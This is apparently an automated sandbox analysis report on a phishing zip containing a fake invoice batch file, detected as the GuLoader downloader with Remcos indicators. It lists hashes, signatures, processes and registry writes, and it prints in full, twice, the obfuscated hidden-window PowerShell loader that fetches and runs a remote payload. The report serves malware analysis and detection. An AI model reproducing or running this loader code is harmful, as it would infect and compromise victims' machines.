File name: _5343f66a8990fda03f679d559553ebefe1b0dfcf562cc46e8566505a4f12f34b.zip

Full analysis: https://app.any.run/tasks/3902e40b-dab6-4a29-997b-82b7351a0e83
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Analysis date: November 03, 2025, 08:31:57
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
ipfs
phishing
massbass
remcos
rat
guloader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: 48685FEDD82192929201863283D06E13
SHA1: 6F9DED5C458577E57D736FD276C7ACD0F2D2EC9D
SHA256: 5343F66A8990FDA03F679D559553EBEFE1B0DFCF562CC46E8566505A4F12F34B
SSDEEP: 96:eFroQKYNGutd4KD0xXPbbt9IhG+6+u81W1GyIuviFygEzQ0Y44rjN:axGut6EObtahI+Z45vzhlKjN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 7584)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7832)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2276)
    • PowerShell executes remote file download (POWERSHELL)

      • powershell.exe (PID: 7832)
    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 7832)
    • GULOADER SHELLCODE has been detected (YARA)

      • msiexec.exe (PID: 2144)
    • GULOADER has been detected (YARA)

      • msiexec.exe (PID: 2144)
    • REMCOS mutex has been found

      • msiexec.exe (PID: 2144)
  • SUSPICIOUS

    • Get information on the list of running processes

      • cmd.exe (PID: 7760)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7760)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 7760)
    • Escape characters obfuscation (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)
    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 2276)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)
    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7832)
    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 7832)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 4996)
    • Connects to unusual port

      • msiexec.exe (PID: 2144)
  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 7760)
      • powershell.exe (PID: 4996)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)
    • Disables trace logs

      • powershell.exe (PID: 7832)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)
    • Checks proxy server information

      • powershell.exe (PID: 7832)
      • msiexec.exe (PID: 2144)
      • slui.exe (PID: 7272)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7832)
      • powershell.exe (PID: 4996)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4996)
    • Reads the software policy settings

      • msiexec.exe (PID: 2144)
      • slui.exe (PID: 7272)
    • Reads security settings of Internet Explorer

      • msiexec.exe (PID: 2144)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2025:11:02 05:29:50
ZipCRC: 0x994d9e00
ZipCompressedSize: 3746
ZipUncompressedSize: 6075
ZipFileName: INV11036587-, tbilisi SLB-MQ0067-10-25 DB0T4QQH1.bat
No data.
All screenshots are available in the full report
Total processes: 152
Monitored processes: 9
Malicious processes: 5
Suspicious processes: 0

Behavior graph

Process nodes shown in the graph ("no specs" marks a process without triggered signatures):
  • start
  • winrar.exe (no specs)
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • powershell.exe
  • #PHISHING svchost.exe
  • powershell.exe (no specs)
  • conhost.exe (no specs)
  • #GULOADER msiexec.exe
  • slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2144
CMD: "C:\WINDOWS\SysWOW64\msiexec.exe"
Path: C:\Windows\SysWOW64\msiexec.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 2276
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4996"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "del 'vrngendes';function Unvituperatively ($kuttab='checkrytters',$copyright='clickers'){ ;$cembalist=3;do { $cooling+=$kuttab[$cembalist];$cembalist+=4;Out-Host}until (!$kuttab[$cembalist])$cooling}function Impinging ($kvikkernes){.($imprecators) ($kvikkernes)}$yderbanen=[Nullable[int]]0;$statstilskuddet=Unvituperatively ' ==ntt e///TRR .&&&W<<<E';$statstilskuddet+=Unvituperatively ':::Bv,vc,PPl ||IMMMEcccN++ T';$disrealises=Unvituperatively 'EEEM;;;o ,+z z i~~~lQQQl// aJJJ/';$menneskeliggrelse=Unvituperatively 'nnnT|||l===sooo1|.|2';$puttee=' ##[%% NiiiE FFt---.XXXsDDDemmmr^^^V H i &&cTTTe,qqPhhhO YYiWWWNvvvTWWWmttta---nuuuaoooG %%E,hhRI I] ??: II: zzsv,vEss.cPPPU-,-RrrrigggTI.Iy < P ppR AAoS ST ==O kkCii o##,Ljjj=!!!$ MMMGG EZZZN qqNWW efffSzz,KyyyEdddltttIqqqGtttg ++Rtt.EI IlGGGs >>e';$disrealises+=Unvituperatively ' L 5.ll. mm0qq. ZZZ( JJW !!iy ynFFFdsssoww,wooosrrr AA Ngg,TBB. __,1ttt0yyy.oo,0f,f; L S,SW+++iCCCnlll6QQQ4VV ;I I yyyx NN6 < 4YYY;:.: PP rTTTvwww: TT1 MM4_ _4SS .x x0fff) xx *.*G? ?epppcqqqkwwwoBB /PPP2nnn0y y1 TT0bb,0U U1+++0 >>1iii .AF AAiQQ rMM.eT,Tf,wwo mmx___/XX 1 KK4www4>>>.T T0';$mollifiers=Unvituperatively ' mmU<<<s ccekkkRiii-.MMaIIIGgg.E.TTN&& T';$anens=Unvituperatively ' kh k t Bt&&&p __sFF.:PPP/ OO/ oob aaa TTf M.yeeeb###e .|ixxxa //7HHHi## s|| tooofFFFz # u # ps s2***v---i KK5VVVvqqqyIIIcs s5&&&rVVV3 d,qlll3j ju__.oooo2qqqxEEEipppkaaaujjjxNNNb YYpRRRnb b7<< fDD 6~~~7LLLpaa kUUUqiiicTTT4;;;v/ /d ||2 lljNN.iZZ mhhhswww4y ybsssnrrr4|||.===ibbbppp.f^^^sPPP. ,^wggg3F Fsyyy. bblKKKisssn Y.k%%%/ ==Sgggex.xlYYYd~~~s ,leQQQe;;;n Y,. 
yypzzzs>> m';$attraktivitet68=Unvituperatively 'BB.>';$imprecators=Unvituperatively ' r.i vvEU Ux';$communicative='cack';$skaldyraflejring='\Hastvrks.Mod';Impinging (Unvituperatively ' WWOXXXuEEET .j-|| hLLLoOOOsqqqtRR ;xx $ ##g^^^l |o ??B<<<a:::l gg:BBBK ,AbMMME ||N.hhHoooALLLV FFn= =E DDRGGG= .i$ iie uun Bviii: rraFFFp__ PeeedWWWauuutRRRAGGG+JJJ$bbbStt.K|||aNN,l&&&dFFFY!!!rfffA wwF|||LlllELLLJcc R CCI zzN.~~G');Impinging (Unvituperatively '###oEEEU___TTTT-bbbH~~~oPPPSQQ tCCC;JJJ$^^^Gxxxl UUOMMMB VVayyylBBB:iiiosssVGGGE BBr EEhUUUAv.vn^^^d AALXXXefffDGG =ZZ.$ kkAfffnF,Fe,PPn.vvSyyy.XX sy ypTT lllli B tttt(/ /$.EEaCCCT ZZtdd.rYYYa.ZZKkkkt+++icccv m.ImmmT ggEAAAt|,|6^^^8^^^)');Impinging (Unvituperatively $puttee);$dottard='underhorsing';$anens=$overhandled[$yderbanen];$cembalistnkbslisterne='gavottens';$diabetesproduktet=(Unvituperatively '---OqqqU.||tVVV-~~~hww Ov vS ZZtr r;WWW$gg G>>>Lmm oE.EBoooakkklZZZ: F b ssrBBBU---GNN,eSSSR OOS ppkCCCR !!meeeENN n|||e ~~=AAAnzz,E:::wsss-HHHO%%%bwwwj<<<e TTC.--t mm M Msss,yNNNS SSTll e___M% %. dd$ FFs ITEEEAjjjTGGGS<<<tvvvI~~ LBBBS !!kRRRucccDqqqdii.EJJJt');Impinging ($diabetesproduktet);Impinging (Unvituperatively 'nnn$???bnn r Lu%%%gCCCe! !r __sG Gk;;;r RRm<<<e yyn XXeuuu. 
h,HJJJe<.<a __d|| eY,Yr# #s kk[z z$ __mqqqo.CCl .glT.Ti .=f,nni-- eQQQrL Lsttt].===: :$hh dEEEiFFFs///r|,|e!!!avv l---iSSSsWWWefffs');$anisostaminous=Unvituperatively 'L LdYY OmmmWyy n';$anisostaminous+=Unvituperatively 'rr.l .cO.XXArrrd%%%foo i OOlfffE';$wedgewise=Unvituperatively ' KK$ !!bS,Sr///uaa g ++eyyyrOOOs ?ksssr ++mAAAe Yn%%%eUUU.NN $===aQQQn***idddsFFFoFFFsnnnt,wwavvvmHHHi f n,IIoyy u ##s:::.OOOI%% n ::v|| oIIIkgggeGGG(EE $ >at,tnrrre ggn.;;s & ,YYY$C CwYYYoaaao AAlrrrskkkk.YYi&&&nooo2 pp7 qq)';$woolskin27=$kbenhavner;del 'beboelseshuse';Impinging (Unvituperatively 'fffoHH uXXXt p -:::hVVVott.s;;;T= =; ==f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&&G.WWlRRRoxxxbjj Af.fliii:ooobJJ.I==,T JJt ##e ffRBBBw^ ^EJJJEwwwDp p=DDD(+++tT.TeFFFSwwwT|||- GpUUUAE EtoooH ~~ vvv$SSSw ddO.PPOeeel VVS,CCk&&&iXXXn&&&2 rr7l l)');del 'ubrdelig';while ((!$bitterweed)) {Impinging (Unvituperatively '.HHO_._ukkktYYY- V Hzzzob bs ##tppp;w w$ ddg>>>l>>>oAAAb,VVa;; l kk:UUUA ||n~~~t &&ix,xc WWoHH m|||mMMMe:: rll cKKKi.VVagggl gi,OOtmmmy P=q q$mmmkOOOa Ty^^^o===i ddnD.Dg') ;Impinging $wedgewise;Impinging (Unvituperatively ' CC[|.|tF.Fh qqR,WWE,&&AU Ud FFicccNgggGJJ,. At~~~hbbbR R,et tavv,d;;;]>>,:///:hhhSJJJLdddEbbbE^^^pnnn(aaa3hhh7 E5___0a.a)');Impinging (Unvituperatively 'aaaoWWWUnnntkkk-pppH ?oh hS **Tccc;.yy$QQQgc cl -OooobSSSA=.=l&&&:TTTbCCCiRRRtBBBt f.EpppR __wj jEfffepppD== =III(,!!Tb bEhhhSYYYtzz -bbbp===aeeet FFHWWW ??$vv.w ||ODDDo???L aaSpp k xxiGGGNUUU2>>>7~~~)') ;Impinging (Unvituperatively '===OVVVun,nTGGG-bbbHxxxO KKsgggT ,W;qqq$ll g,vvlIIIo ,Nb %%ahhhL|||:NNNc___I&& t***ybbbf ,>iIIIeWWWd j,=XXX$ ooG&&&L&& o%%%b UUA O l;;;: ,pUuuuay ymccce== R++ IcccKyyyArrrNVV s^ ^KEEE+eee+ uu%UUU$ !!ohhhv YYE~~~rzzzhZZZA---neeeDXXXlJJJellld YY. 
nnC%%%o.IIu ##nXXXt') ;$anens=$overhandled[$cityfied]}$steners=219711;$cembalistndflytters=30896;Impinging (Unvituperatively '.DDOIIIUGGGt&&&-!!!H AAO .%sJJJT jj; =$ ::G,FFlHHHon.nB+++aWWWlCCC:NN t___EBB Rk kM^^ i Z Nttta+++ldd.IMMMsWWWE >>dqqq8 XX5|.| nnn=^^^ nnG PPE,nnt ~~-UU.cbbbOl,lN <<t:::e vN:::t || c,c$.mmw///OUUUObbblrrrS ttk***izzzNggg2VV 7');Impinging (Unvituperatively ' ooO mmuRRRt AA-VVVH e.ogg s BBt II; pp$~~~gppplvvvo.FFbe,eaXXXl%%%:bbbWqq.etttihhhr //dUUUl FFe===sOOOs///nvvveHH.s eesq.q .>>= // __ [<<<S###y:::sSSSt^^.eXXXm___.~~ CVVVoHHHn QQvBBBe^^^rH Ht?,?]vv.:kkk:+++F UUr,//o:: m///B===a;;;s HHe???6X X4bbbSr rtOOOr WWicc,nJJJgJ J(FFF$ DDtcccee.erSS.mss i,XXnKK,a& &lc ciBB s IIe vvd i 8VV.5qqq)');Impinging (Unvituperatively '.~~O ::u^^^TXXX-???h-- o bbsmm,T ##;__ $I IgsssLsssO,--BJJ A z lqqq: KKU VVnQQQD% %EeeeR j h~~~O %%rvvvs ++icccN vvG p h h=uuu FFF[~.~T?,?Ezzzx TTtccc.EE EOOONCCCC + ODDDd %%ipppn ++gss ]___:QQQ: ccaMMMS|||C_ _iww iXX .NNNgII eT TtAAAs~~~T ggr| |i_ _NDDDGfff(bbb$uuuW ue ;;ipppR>>>D>>>L ddejjjSdddSz.zN#,#e UUSf.fS nn)');Impinging (Unvituperatively 'zzzo PPu,++tEEE- .ch X oFFFsccct___;Y Y$mmmgcccLGGGoTT BWWWaccclAAA:g,gTqqqAii MWWWB^^ U___r<<<A|||STTT=kk,$rrrulllNJ JdLLLE XXr nnh TTO^^^R E s B I;;;N&&.g++..>>>sTTTu<<<bTTTsVVVt+++rJJ,i wwN G.g,>>(iii$ &&s ZZt---E ^N<<<Ei irXX s.xx,,UU$ ttCAAAeTTTMNNNB:::aooolNNNi nnsaaaTee nXXXd GGF ,YLeeey TTt???T.AAEuuur+++S///)');Impinging $tamburas;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 5516
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7272
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 7584
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\_5343f66a8990fda03f679d559553ebefe1b0dfcf562cc46e8566505a4f12f34b.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 7760
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\INV11036587-, tbilisi SLB-MQ0067-10-25 DB0T4QQH1.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 7768
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7832powershell.exe -windowstyle hidden "del 'vrngendes';function Unvituperatively ($kuttab='checkrytters',$copyright='clickers'){ ;$cembalist=3;do { $cooling+=$kuttab[$cembalist];$cembalist+=4;Out-Host}until (!$kuttab[$cembalist])$cooling}function Impinging ($kvikkernes){.($imprecators) ($kvikkernes)}$yderbanen=[Nullable[int]]0;$statstilskuddet=Unvituperatively ' ==ntt e///TRR .&&&W<<<E';$statstilskuddet+=Unvituperatively ':::Bv,vc,PPl ||IMMMEcccN++ T';$disrealises=Unvituperatively 'EEEM;;;o ,+z z i~~~lQQQl// aJJJ/';$menneskeliggrelse=Unvituperatively 'nnnT|||l===sooo1|.|2';$puttee=' ##[%% NiiiE FFt---.XXXsDDDemmmr^^^V H i &&cTTTe,qqPhhhO YYiWWWNvvvTWWWmttta---nuuuaoooG %%E,hhRI I] ??: II: zzsv,vEss.cPPPU-,-RrrrigggTI.Iy < P ppR AAoS ST ==O kkCii o##,Ljjj=!!!$ MMMGG EZZZN qqNWW efffSzz,KyyyEdddltttIqqqGtttg ++Rtt.EI IlGGGs >>e';$disrealises+=Unvituperatively ' L 5.ll. mm0qq. ZZZ( JJW !!iy ynFFFdsssoww,wooosrrr AA Ngg,TBB. __,1ttt0yyy.oo,0f,f; L S,SW+++iCCCnlll6QQQ4VV ;I I yyyx NN6 < 4YYY;:.: PP rTTTvwww: TT1 MM4_ _4SS .x x0fff) xx *.*G? ?epppcqqqkwwwoBB /PPP2nnn0y y1 TT0bb,0U U1+++0 >>1iii .AF AAiQQ rMM.eT,Tf,wwo mmx___/XX 1 KK4www4>>>.T T0';$mollifiers=Unvituperatively ' mmU<<<s ccekkkRiii-.MMaIIIGgg.E.TTN&& T';$anens=Unvituperatively ' kh k t Bt&&&p __sFF.:PPP/ OO/ oob aaa TTf M.yeeeb###e .|ixxxa //7HHHi## s|| tooofFFFz # u # ps s2***v---i KK5VVVvqqqyIIIcs s5&&&rVVV3 d,qlll3j ju__.oooo2qqqxEEEipppkaaaujjjxNNNb YYpRRRnb b7<< fDD 6~~~7LLLpaa kUUUqiiicTTT4;;;v/ /d ||2 lljNN.iZZ mhhhswww4y ybsssnrrr4|||.===ibbbppp.f^^^sPPP. ,^wggg3F Fsyyy. bblKKKisssn Y.k%%%/ ==Sgggex.xlYYYd~~~s ,leQQQe;;;n Y,. 
yypzzzs>> m';$attraktivitet68=Unvituperatively 'BB.>';$imprecators=Unvituperatively ' r.i vvEU Ux';$communicative='cack';$skaldyraflejring='\Hastvrks.Mod';Impinging (Unvituperatively ' WWOXXXuEEET .j-|| hLLLoOOOsqqqtRR ;xx $ ##g^^^l |o ??B<<<a:::l gg:BBBK ,AbMMME ||N.hhHoooALLLV FFn= =E DDRGGG= .i$ iie uun Bviii: rraFFFp__ PeeedWWWauuutRRRAGGG+JJJ$bbbStt.K|||aNN,l&&&dFFFY!!!rfffA wwF|||LlllELLLJcc R CCI zzN.~~G');Impinging (Unvituperatively '###oEEEU___TTTT-bbbH~~~oPPPSQQ tCCC;JJJ$^^^Gxxxl UUOMMMB VVayyylBBB:iiiosssVGGGE BBr EEhUUUAv.vn^^^d AALXXXefffDGG =ZZ.$ kkAfffnF,Fe,PPn.vvSyyy.XX sy ypTT lllli B tttt(/ /$.EEaCCCT ZZtdd.rYYYa.ZZKkkkt+++icccv m.ImmmT ggEAAAt|,|6^^^8^^^)');Impinging (Unvituperatively $puttee);$dottard='underhorsing';$anens=$overhandled[$yderbanen];$cembalistnkbslisterne='gavottens';$diabetesproduktet=(Unvituperatively '---OqqqU.||tVVV-~~~hww Ov vS ZZtr r;WWW$gg G>>>Lmm oE.EBoooakkklZZZ: F b ssrBBBU---GNN,eSSSR OOS ppkCCCR !!meeeENN n|||e ~~=AAAnzz,E:::wsss-HHHO%%%bwwwj<<<e TTC.--t mm M Msss,yNNNS SSTll e___M% %. dd$ FFs ITEEEAjjjTGGGS<<<tvvvI~~ LBBBS !!kRRRucccDqqqdii.EJJJt');Impinging ($diabetesproduktet);Impinging (Unvituperatively 'nnn$???bnn r Lu%%%gCCCe! !r __sG Gk;;;r RRm<<<e yyn XXeuuu. 
h,HJJJe<.<a __d|| eY,Yr# #s kk[z z$ __mqqqo.CCl .glT.Ti .=f,nni-- eQQQrL Lsttt].===: :$hh dEEEiFFFs///r|,|e!!!avv l---iSSSsWWWefffs');$anisostaminous=Unvituperatively 'L LdYY OmmmWyy n';$anisostaminous+=Unvituperatively 'rr.l .cO.XXArrrd%%%foo i OOlfffE';$wedgewise=Unvituperatively ' KK$ !!bS,Sr///uaa g ++eyyyrOOOs ?ksssr ++mAAAe Yn%%%eUUU.NN $===aQQQn***idddsFFFoFFFsnnnt,wwavvvmHHHi f n,IIoyy u ##s:::.OOOI%% n ::v|| oIIIkgggeGGG(EE $ >at,tnrrre ggn.;;s & ,YYY$C CwYYYoaaao AAlrrrskkkk.YYi&&&nooo2 pp7 qq)';$woolskin27=$kbenhavner;del 'beboelseshuse';Impinging (Unvituperatively 'fffoHH uXXXt p -:::hVVVott.s;;;T= =; ==f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&&G.WWlRRRoxxxbjj Af.fliii:ooobJJ.I==,T JJt ##e ffRBBBw^ ^EJJJEwwwDp p=DDD(+++tT.TeFFFSwwwT|||- GpUUUAE EtoooH ~~ vvv$SSSw ddO.PPOeeel VVS,CCk&&&iXXXn&&&2 rr7l l)');del 'ubrdelig';while ((!$bitterweed)) {Impinging (Unvituperatively '.HHO_._ukkktYYY- V Hzzzob bs ##tppp;w w$ ddg>>>l>>>oAAAb,VVa;; l kk:UUUA ||n~~~t &&ix,xc WWoHH m|||mMMMe:: rll cKKKi.VVagggl gi,OOtmmmy P=q q$mmmkOOOa Ty^^^o===i ddnD.Dg') ;Impinging $wedgewise;Impinging (Unvituperatively ' CC[|.|tF.Fh qqR,WWE,&&AU Ud FFicccNgggGJJ,. At~~~hbbbR R,et tavv,d;;;]>>,:///:hhhSJJJLdddEbbbE^^^pnnn(aaa3hhh7 E5___0a.a)');Impinging (Unvituperatively 'aaaoWWWUnnntkkk-pppH ?oh hS **Tccc;.yy$QQQgc cl -OooobSSSA=.=l&&&:TTTbCCCiRRRtBBBt f.EpppR __wj jEfffepppD== =III(,!!Tb bEhhhSYYYtzz -bbbp===aeeet FFHWWW ??$vv.w ||ODDDo???L aaSpp k xxiGGGNUUU2>>>7~~~)') ;Impinging (Unvituperatively '===OVVVun,nTGGG-bbbHxxxO KKsgggT ,W;qqq$ll g,vvlIIIo ,Nb %%ahhhL|||:NNNc___I&& t***ybbbf ,>iIIIeWWWd j,=XXX$ ooG&&&L&& o%%%b UUA O l;;;: ,pUuuuay ymccce== R++ IcccKyyyArrrNVV s^ ^KEEE+eee+ uu%UUU$ !!ohhhv YYE~~~rzzzhZZZA---neeeDXXXlJJJellld YY. 
nnC%%%o.IIu ##nXXXt') ;$anens=$overhandled[$cityfied]}$steners=219711;$cembalistndflytters=30896;Impinging (Unvituperatively '.DDOIIIUGGGt&&&-!!!H AAO .%sJJJT jj; =$ ::G,FFlHHHon.nB+++aWWWlCCC:NN t___EBB Rk kM^^ i Z Nttta+++ldd.IMMMsWWWE >>dqqq8 XX5|.| nnn=^^^ nnG PPE,nnt ~~-UU.cbbbOl,lN <<t:::e vN:::t || c,c$.mmw///OUUUObbblrrrS ttk***izzzNggg2VV 7');Impinging (Unvituperatively ' ooO mmuRRRt AA-VVVH e.ogg s BBt II; pp$~~~gppplvvvo.FFbe,eaXXXl%%%:bbbWqq.etttihhhr //dUUUl FFe===sOOOs///nvvveHH.s eesq.q .>>= // __ [<<<S###y:::sSSSt^^.eXXXm___.~~ CVVVoHHHn QQvBBBe^^^rH Ht?,?]vv.:kkk:+++F UUr,//o:: m///B===a;;;s HHe???6X X4bbbSr rtOOOr WWicc,nJJJgJ J(FFF$ DDtcccee.erSS.mss i,XXnKK,a& &lc ciBB s IIe vvd i 8VV.5qqq)');Impinging (Unvituperatively '.~~O ::u^^^TXXX-???h-- o bbsmm,T ##;__ $I IgsssLsssO,--BJJ A z lqqq: KKU VVnQQQD% %EeeeR j h~~~O %%rvvvs ++icccN vvG p h h=uuu FFF[~.~T?,?Ezzzx TTtccc.EE EOOONCCCC + ODDDd %%ipppn ++gss ]___:QQQ: ccaMMMS|||C_ _iww iXX .NNNgII eT TtAAAs~~~T ggr| |i_ _NDDDGfff(bbb$uuuW ue ;;ipppR>>>D>>>L ddejjjSdddSz.zN#,#e UUSf.fS nn)');Impinging (Unvituperatively 'zzzo PPu,++tEEE- .ch X oFFFsccct___;Y Y$mmmgcccLGGGoTT BWWWaccclAAA:g,gTqqqAii MWWWB^^ U___r<<<A|||STTT=kk,$rrrulllNJ JdLLLE XXr nnh TTO^^^R E s B I;;;N&&.g++..>>>sTTTu<<<bTTTsVVVt+++rJJ,i wwN G.g,>>(iii$ &&s ZZt---E ^N<<<Ei irXX s.xx,,UU$ ttCAAAeTTTMNNNB:::aooolNNNi nnsaaaTee nXXXd GGF ,YLeeey TTt???T.AAEuuur+++S///)');Impinging $tamburas;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 20 228
Read events: 20 213
Write events: 15
Delete events: 0

Modification events

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\preferences.zip

(PID) Process: (7584) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\chromium_ext.zip

(PID) Process: (7584) WinRAR.exe
